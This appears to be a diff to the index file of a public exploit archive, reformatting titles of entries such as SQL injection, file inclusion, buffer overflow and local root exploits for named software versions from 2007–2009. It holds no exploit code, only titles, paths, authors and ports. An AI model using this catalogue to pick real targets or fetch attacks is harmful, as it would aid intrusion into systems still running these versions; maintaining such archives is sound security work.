1.8.4 Bypass Upload Shell From Your Profile Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 -4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g logurl() - Remote Buffer Overflow Exploit (Win32) (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 +4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g - logurl() - Remote Buffer Overflow Exploit (Win32) (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) RFI Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - Bluetooth Stack Local Root Exploit",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 @@ -4537,7 +4537,7 @@ id,file,description,date,author,platform,type,port 4893,platforms/linux/dos/4893.c,"Linux Kernel <= 2.6.21.1 - IPv6 Jumbo Bug Remote DoS Exploit",2008-01-11,"Clemens Kurtenbach",linux,dos,0 4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit",2008-01-11,Elazar,windows,remote,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 (id) Remote SQL Injection Vulnerability",2008-01-11,"Raw Security",php,webapps,0 -4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 +4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron <= 1.7 (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 (articlecat) SQL Injection Vulnerability",2008-01-12,ka0x,php,webapps,0 4899,platforms/php/webapps/4899.txt,"TaskFreak! <= 0.6.1 - Remote SQL Injection Vulnerability",2008-01-12,TheDefaced,php,webapps,0 @@ -4580,7 +4580,7 @@ id,file,description,date,author,platform,type,port 4936,platforms/php/webapps/4936.txt,"Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 (linkbar.php cfile) Remote File Inclusion Vulnerability",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - (.dsr) File Handling BoF Exploit",2008-01-18,shinnai,windows,local,0 -4939,platforms/php/webapps/4939.txt,"WordPress plugin WP-Forum 1.7.4 - Remote SQL Injection Vulnerability",2008-01-19,"websec Team",php,webapps,0 +4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - Remote SQL Injection Vulnerability",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Auth Bypass Vulnerability",2008-01-20,DarkFig,hardware,remote,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability",2008-01-20,Sha0,php,webapps,0 @@ -4633,7 +4633,7 @@ id,file,description,date,author,platform,type,port 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 Numerous Remote SQL Injection Vulnerabilities",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities",2008-01-26,Stack,php,webapps,0 4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 -4993,platforms/php/webapps/4993.txt,"WordPress plugin fGallery 2.4.1 - fimrss.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 +4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,sh2kerr,multiple,local,0 @@ -5288,7 +5288,7 @@ id,file,description,date,author,platform,type,port 5660,platforms/php/webapps/5660.txt,"Php Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability",2008-05-20,InjEctOr5,php,webapps,0 5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 (index.php pageid) SQL Injection Vulnerability",2008-05-21,InjEctOr5,php,webapps,0 5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution Vulnerability",2008-05-21,DSecRG,cgi,webapps,0 -5663,platforms/php/webapps/5663.txt,"6rbScript (news.php newsid) Remote SQL Injection Vulnerability",2008-05-21,"Hussin X",php,webapps,0 +5663,platforms/php/webapps/5663.txt,"6rbScript - (news.php newsid) Remote SQL Injection Vulnerability",2008-05-21,"Hussin X",php,webapps,0 5664,platforms/php/webapps/5664.txt,"webl?sninger <= 4 - (XSS/SQL) Multiple Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 5665,platforms/php/webapps/5665.txt,"Netbutikker <= 4 - Remote SQL Injection Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 (uid) Blind SQL Injection Vulnerability",2008-05-22,"Virangar Security",php,webapps,0 @@ -6620,7 +6620,7 @@ id,file,description,date,author,platform,type,port 7057,platforms/php/webapps/7057.pl,"MemHT Portal <= 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (upload/XSS) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion Vulnerability",2008-11-08,BugReport.IR,php,webapps,0 -7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0 +7060,platforms/hardware/dos/7060.txt,"2Wire DSL Router (xslt) - Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Auth Bypass) SQL Injection Vulnerability",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"ZEEJOBSITE 2.0 - Remote File Upload Vulnerability",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat - Profiles/Dating Script 3.0.2 - Insecure Cookie Handling Vulnerability",2008-11-08,Stack,php,webapps,0 @@ -7050,9 +7050,9 @@ id,file,description,date,author,platform,type,port 7507,platforms/php/webapps/7507.pl,"Lizardware CMS <= 0.6.0 - Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS (QuickerSite.mdb) Database Disclosure Vulnerability",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload Vulnerability",2008-12-18,Pouya_Server,php,webapps,0 -7510,platforms/php/webapps/7510.txt,"2532/gigs 1.2.2 stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 -7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 - Stable Remote Login Bypass Vulnerability",2008-12-18,StAkeR,php,webapps,0 -7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 - Stable Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 +7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 +7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass Vulnerability",2008-12-18,StAkeR,php,webapps,0 +7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 Insecure Cookie Handling Vulnerability",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) Remote SQL Injection Vulnerability",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite <= 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 @@ -7275,7 +7275,7 @@ id,file,description,date,author,platform,type,port 7735,platforms/php/webapps/7735.pl,"Simple Machines Forum <= 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 -7738,platforms/php/webapps/7738.txt,"WordPress plugin WP-Forum 1.7.8 - Remote SQL Injection Vulnerability",2009-01-12,seomafia,php,webapps,0 +7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - Remote SQL Injection Vulnerability",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload Vulnerability",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure Vulnerability",2009-01-12,Cyber-Zone,asp,webapps,0 @@ -7421,10 +7421,10 @@ id,file,description,date,author,platform,type,port 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload Vulnerability",2009-01-27,S.W.A.T.,php,webapps,0 7885,platforms/php/webapps/7885.txt,"Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability",2009-01-27,"Salvatore Fresta",php,webapps,0 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion Vulnerabilities",2009-01-27,DSecRG,php,webapps,0 -7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 (PLS File) Stack Overflow PoC",2009-01-27,Hakxer,windows,dos,0 -7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 (PLS File) Local Buffer Overflow Exploit (univ)",2009-01-28,Houssamix,windows,local,0 -7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 -7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 (gqmpeg File) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 +7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - (PLS File) Stack Overflow PoC",2009-01-27,Hakxer,windows,dos,0 +7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - (PLS File) Local Buffer Overflow Exploit (univ)",2009-01-28,Houssamix,windows,local,0 +7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - (M3U FILE) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 +7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - (gqmpeg File) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7892,platforms/php/webapps/7892.php,"Community CMS <= 0.4 (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (XSS/SQL/LFI) Multiple Vulnerabilities",2009-01-28,"Encrypt3d.M!nd ",php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog (Auth Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 @@ -7527,7 +7527,7 @@ id,file,description,date,author,platform,type,port 7997,platforms/php/webapps/7997.htm,"txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload Vulnerability",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 -8000,platforms/php/webapps/8000.txt,"zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 +8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities",2009-02-06,SirGod,php,webapps,0 8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) Remote SQL Injection Vulnerability",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS <= 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 @@ -7549,7 +7549,7 @@ id,file,description,date,author,platform,type,port 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) XSS Vulnerability",2009-02-09,make0day,php,webapps,0 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC <= 0.1.0 - Local File Inclusion Vulnerability",2009-02-09,Kacper,php,webapps,0 8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit",2009-02-09,"Praveen Darshanam",multiple,dos,0 -8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass",2009-02-09,ikki,hardware,remote,0 +8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0 8023,platforms/hardware/remote/8023.txt,"ZeroShell <= 1.0beta11 - Remote Code Execution Vulnerability",2009-02-09,ikki,hardware,remote,0 8024,platforms/windows/dos/8024.py,"TightVNC Authentication Failure Integer Overflow PoC",2009-02-09,desi,windows,dos,0 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion Vulnerabilities",2009-02-09,ahmadbady,php,webapps,0 @@ -8021,7 +8021,7 @@ id,file,description,date,author,platform,type,port 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 8513,platforms/php/webapps/8513.pl,"Dokeos Lms <= 1.8.5 (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 8514,platforms/php/webapps/8514.txt,"elkagroup Image Gallery 1.0 - Arbitrary File Upload Vulnerability",2009-04-22,Securitylab.ir,php,webapps,0 -8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 (Auth Bypass) SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0 +8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Auth Bypass) SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0 8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials Remote Cross-Site Scripting Exploit",2009-04-22,jdc,php,webapps,0 8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0 @@ -8192,9 +8192,9 @@ id,file,description,date,author,platform,type,port 8686,platforms/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling Vulnerability",2009-05-14,TiGeR-Dz,php,webapps,0 8687,platforms/php/webapps/8687.txt,"MRCGIGUY The Ticket System 2.0 - Insecure Cookie Handling Vulnerability",2009-05-14,TiGeR-Dz,php,webapps,0 8688,platforms/php/webapps/8688.txt,"MRCGIGUY Ultimate Profit Portal 1.0.1 - Insecure Cookie Handling Vulnerability",2009-05-14,TiGeR-Dz,php,webapps,0 -8689,platforms/php/webapps/8689.txt,"2daybiz business community script - Multiple Vulnerabilities",2009-05-14,TiGeR-Dz,php,webapps,0 +8689,platforms/php/webapps/8689.txt,"2DayBiz Business Community Script - Multiple Vulnerabilities",2009-05-14,TiGeR-Dz,php,webapps,0 8690,platforms/php/webapps/8690.txt,"Easy Scripts Answer and Question Script - Multiple Vulnerabilities",2009-05-14,InjEctOr5,php,webapps,0 -8691,platforms/php/webapps/8691.txt,"2daybiz Template Monster Clone (edituser.php) Change Pass Exploit",2009-05-14,TiGeR-Dz,php,webapps,0 +8691,platforms/php/webapps/8691.txt,"2DayBiz Template Monster Clone - 'edituser.php' Change Pass Exploit",2009-05-14,TiGeR-Dz,php,webapps,0 8692,platforms/php/webapps/8692.txt,"MRCGIGUY SimpLISTic SQL 2.0.0 - Insecure Cookie Handling Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0 8694,platforms/php/webapps/8694.txt,"MRCGIGUY Top Sites 1.0.0 - Insecure Cookie Handling Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 ctcpbuf Remote Crash Vulnerability",2009-05-15,"Thomas Sader",multiple,dos,0 @@ -8204,7 +8204,7 @@ id,file,description,date,author,platform,type,port 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 8700,platforms/php/webapps/8700.txt,"Rama CMS <= 0.9.8 - (download.php file) File Disclosure Vulnerability",2009-05-15,Br0ly,php,webapps,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)",2009-05-15,His0k4,windows,local,0 -8702,platforms/php/webapps/8702.txt,"2daybiz Custom T-shirt Design (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 +8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Vulnerability",2009-05-15,kingcope,windows,remote,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 Database Disclosure Vulnerability",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 8706,platforms/php/webapps/8706.pl,"PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit",2009-05-15,Br0ly,php,webapps,0 @@ -8412,7 +8412,7 @@ id,file,description,date,author,platform,type,port 8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links (report.php id) Remote SQL Injection Vulnerability",2009-06-09,"ThE g0bL!N",php,webapps,0 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 - RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 - RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0 -8921,platforms/php/webapps/8921.sh,"phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0 +8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0 8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Vulnerability",2009-06-10,"Core Security",windows,remote,0 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion Vulnerability",2009-06-10,Br0ly,php,webapps,0 @@ -8427,7 +8427,7 @@ id,file,description,date,author,platform,type,port 8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0 8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (Windows)",2009-06-12,ryujin,windows,remote,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0 -8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0 +8936,platforms/php/webapps/8936.txt,"4Images <= 1.7.7 - Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (XSS/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 8939,platforms/php/webapps/8939.pl,"phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 @@ -8886,7 +8886,7 @@ id,file,description,date,author,platform,type,port 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-12,"Pedro Laguna",php,webapps,0 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - (gallery.php) Arbitrary Delete/Edit Category Vulnerability",2009-08-12,"ilker Kandemir",php,webapps,0 -9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass & Password Reset Vulnerabilities",2009-08-12,hkm,hardware,remote,0 +9422,platforms/hardware/remote/9422.txt,"2Wire Gateway - Authentication Bypass & Password Reset Vulnerabilities",2009-08-12,hkm,hardware,remote,0 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash Exploit",2009-08-12,murderkey,windows,dos,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injection Vulnerabilities",2009-08-12,"Sense of Security",php,webapps,0 9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / RCE Exploit",2009-08-12,IHTeam,php,webapps,0 @@ -9185,7 +9185,7 @@ id,file,description,date,author,platform,type,port 9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) SQL Injection",2009-09-21,ph1l1ster,multiple,webapps,0 9728,platforms/multiple/webapps/9728.txt,"ProdLer <= 2.0 - Remote File Include Vulnerability",2009-09-21,"cr4wl3r ",multiple,webapps,0 9729,platforms/multiple/webapps/9729.txt,"Loggix Project <= 9.4.5 - Multiple Remote File Include Vulnerability",2009-09-21,"cr4wl3r ",multiple,webapps,0 -9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 SQLi and persistent XSS",2009-09-21,learn3r,multiple,webapps,0 +9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQLi / persistent XSS",2009-09-21,learn3r,multiple,webapps,0 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 @@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0 -9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 +9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 @@ -9248,7 +9248,7 @@ id,file,description,date,author,platform,type,port 9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 statuswml.cgi Command Injection",2009-10-30,"H D Moore",unix,webapps,0 -9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect code execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 +9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 9863,platforms/php/webapps/9863.txt,"Achievo <= 1.3.4 xss",2009-10-14,"Ryan Dewhurst",php,webapps,0 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7-9 - U3D BoF",2009-10-27,"Felipe Andres Manzano",windows,local,0 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 BoF",2009-10-29,Dr_IDE,windows,local,0 @@ -9328,7 +9328,7 @@ id,file,description,date,author,platform,type,port 9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0 9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129 -9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 +9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 @@ -9357,7 +9357,7 @@ id,file,description,date,author,platform,type,port 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security xss",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0 -9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 +9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow / null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 